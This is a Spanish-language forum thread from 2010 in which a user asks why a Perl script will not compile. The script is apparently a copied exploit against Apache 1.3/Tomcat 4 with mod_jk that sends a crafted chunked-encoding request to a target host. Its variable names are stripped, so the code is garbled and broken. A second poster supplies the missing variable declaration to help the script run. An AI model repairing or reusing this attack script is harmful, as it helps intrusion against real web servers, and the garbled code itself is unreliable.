[?]Perl ¿Qué estoy haciendo mal?

Iniciado por Fritos, 15 Junio 2010, 14:12 PM

0 Miembros y 1 Visitante están viendo este tema.

Fritos

Buenas, según el compilador tengo el siguiente error en la siguiente linea:
syntax error at pruebaa.pl line 17, near "="

y aquí el codigo en cuestión:

#!/usr/bin/perl -w

use IO::Socket;

"= Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";

unless (@ARGV == 1) {
  print "\n By Sapient2003\n";
  die "usage: -bash <host to exploit>\n";
}
print "\n By Sapient2003\n";

"= GET / HTTP/1.0\nHost: [0]\nTransfer-ENcoding:
Chunked\n53636f7474";

  = IO::Socket::INET->new(                          [Esta es la linea)))
        PeerAddr => [0],
        PeerPort => 69,
        Proto    => "udp",
) or die "Can't find host [0]\n";
print  ;
print "Attempted to exploit [0]\n";
close();



xassiz_

Código (perl) [Seleccionar]
  = IO::Socket::INET->new(

:S

Como pones el igual así solo? u.u



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE

Fritos

Cita de: xassiz en 15 Junio 2010, 15:21 PM
Código (perl) [Seleccionar]
  = IO::Socket::INET->new(

:S

Como pones el igual así solo? u.u

Sí vas a comentar se más explicito, no para sumar absurdos mensajes.
Gracias.

xassiz_

Cita de: Fritos en 15 Junio 2010, 18:27 PM
Cita de: xassiz en 15 Junio 2010, 15:21 PM
Código (perl) [Seleccionar]
  = IO::Socket::INET->new(

:S

Como pones el igual así solo? u.u

Sí vas a comentar se más explicito, no para sumar absurdos mensajes.
Gracias.
Así quieres que te ayuden? ¬¬

Código (perl) [Seleccionar]
my $NombreDeAlgunaVariable  = IO::Socket::INET->new(



YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE